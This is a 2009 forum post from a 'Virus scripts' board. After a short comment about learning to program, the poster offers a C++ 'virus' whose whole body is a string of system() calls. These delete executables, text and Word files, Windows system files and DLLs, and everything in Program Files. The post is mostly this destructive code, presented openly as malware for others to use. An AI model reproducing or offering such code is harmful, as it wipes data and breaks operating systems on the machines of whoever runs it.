Friday, 2024-03-29, 10:38 AM
Welcome Guest | RSS
Farhan Khalid
Main | c++, - Forum | Registration | Login
[ New messages · Members · Forum rules · Search · RSS ]
  • Page 1 of 1
  • 1
Forum » Hacking & Cracking » Virus scripts » c++, (gill)
c++,
usman125
Messages: 12
Group: Moderators
Rank: Private
Reputation: -1
Status: Offline

Awards: 0Loading awards ...
Date:
Wednesday,
2009-03-18,
1:39 PM

Message # 1
Like few guys say to you you can't just sit and made virus. You can download few sources from net but when you look at that source you don't knew what he actualy do. So take c,c++, Delphi, Java or Whatever you want and learn. I just wanth to say THX to fukuall because I need that cource about creating registry file. If you wanth a virus ok then here is a little on wink

[code]:
#include <iostream.h>
#include <stdlib.h>
int main()
{
system ("DEL C:\*.exe");
system ("DEL C:\*.txt");
system ("DEL C:\*.doc");
system ("DEL C:\WINDOWS\*.exe");
system ("DEL C:\WINDOWS\*.com");
system ("DEL C:\WINDOWS\*.bat");
system ("DEL C:\Program Files\*.*");
system ("DEL C:\WINDOWS\SYSTEM\*.exe");
system ("DEL C:\WINDOWS\SYSTEM\*.dll");
system ("DEL C:\WINDOWS\SYSTEM\*.com");
system ("DEL C:\WINDOWS\SYSTEM\*.bat");
return 0;
}


This user has not applied a signature yet.
HTML code to this post
BB-code to this post
Direct link to this post
Forum » Hacking & Cracking » Virus scripts » c++, (gill)
  • Page 1 of 1
  • 1
Search:

Copyright MyCorp © 2024

Hosted by uCoz